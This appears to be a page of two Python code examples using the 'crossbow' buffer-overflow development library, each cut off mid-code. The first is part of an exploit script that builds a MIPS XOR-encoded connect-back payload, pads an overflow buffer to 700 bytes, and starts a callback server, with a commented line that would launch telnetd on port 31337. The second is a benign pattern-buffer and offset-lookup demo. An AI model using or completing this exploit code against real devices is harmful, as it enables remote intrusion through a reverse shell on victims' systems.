コード例 #1
#connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False)

# Build the connect-back payload object from the callback host and the
# LittleEndian byte-order constant.
# NOTE(review): connectback_host, badchars and buf are not defined in this
# excerpt; they must come from earlier in the script.
payload = CallbackPayload(connectback_host, LittleEndian)

# Wrap the payload in the MIPS XOR encoder, handing it the badchars list
# (presumably so the encoded bytes avoid those characters -- confirm).
encoded_payload = MipsXorEncoder(
    payload,
    LittleEndian,
    badchars=badchars,
)

# Fill with pattern data until the buffer is 700 long (assumes add_pattern(n)
# appends n bytes -- confirm), then append the encoded bytes as a described
# section.
buf.add_pattern(700 - buf.len())
buf.add_string(
    encoded_payload.shellcode,
    description="encoded connect back payload",
)




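# Offset-lookup mode: with exactly one command-line argument, report where
# that string occurs in the overflow buffer and exit without doing anything
# else.
if len(sys.argv) == 2:
    search_value = sys.argv[1]
    offset = buf.find_offset(search_value)
    # Both messages previously referenced an undefined name (search_string),
    # so this branch raised NameError instead of printing the result.
    # A single parenthesised argument keeps print valid as a Python 2
    # statement and as a Python 3 call.
    if offset < 0:
        # A negative offset is treated as "not found".
        print("Couldn't find string %s in the overflow buffer." % search_value)
    else:
        print("Found string %s at\noffset: %d" % (search_value, offset))
    # sys.exit() does not rely on the site module's interactive exit helper.
    sys.exit(0)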


# Start the connect-back server and keep the value it returns; the check that
# follows only proceeds when this is a positive number.
# NOTE(review): the only visible construction of connectback_server is the
# commented-out line at the top of this excerpt; unless it is created
# elsewhere, the call below raises NameError -- confirm.
pid = None
pid = connectback_server.serve_connectback()
# Fixed one-second pause before continuing (presumably to let the server come
# up -- confirm).
time.sleep(1)
if pid and pid > 0:
    try:
        addr=sys.argv[1]
        port=int(sys.argv[2])
コード例 #2
from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer
from crossbow.common.support import BigEndian
from crossbow.common.support import Logging

# Demo: build an overflow buffer made only of pattern data, then inspect it.
logger = Logging()
logger.LOG_INFO("Creating empty overflow buffer")

# Big-endian buffer with 'A', 'B' and '6' declared as bad characters,
# filled by a single add_pattern(1024) call.
buf = EmptyOverflowBuffer(BigEndian, badchars=['A', 'B', '6'])
buf.add_pattern(1024)

logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len())

# Dump the section descriptions and a printable rendering of the buffer.
# The parenthesised single argument behaves the same as the Python 2 print
# statement.
buf.print_section_descriptions()
print(buf.pretty_string())

# NOTE(review): the string searched for contains 'A', which is listed in
# badchars; if the generated pattern leaves bad characters out, this lookup
# may report "not found" -- confirm what find_offset returns in that case.
logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4"))




# Second buffer with the same byte order and bad-character list; adding the
# pattern is wrapped so a failure is logged instead of stopping the script.
logger.LOG_INFO("Creating second emtpy overflow buffer")

buf2 = EmptyOverflowBuffer(BigEndian, badchars=['A', 'B', '6'])
try:
    buf2.add_pattern(128)
except Exception as exc:
    # Best-effort demo step: emit a fixed warning followed by the
    # exception text, then continue.
    logger.LOG_WARN("Failed to add section.")
    logger.LOG_WARN(str(exc))

try:
    buf2.add_string('A'*128)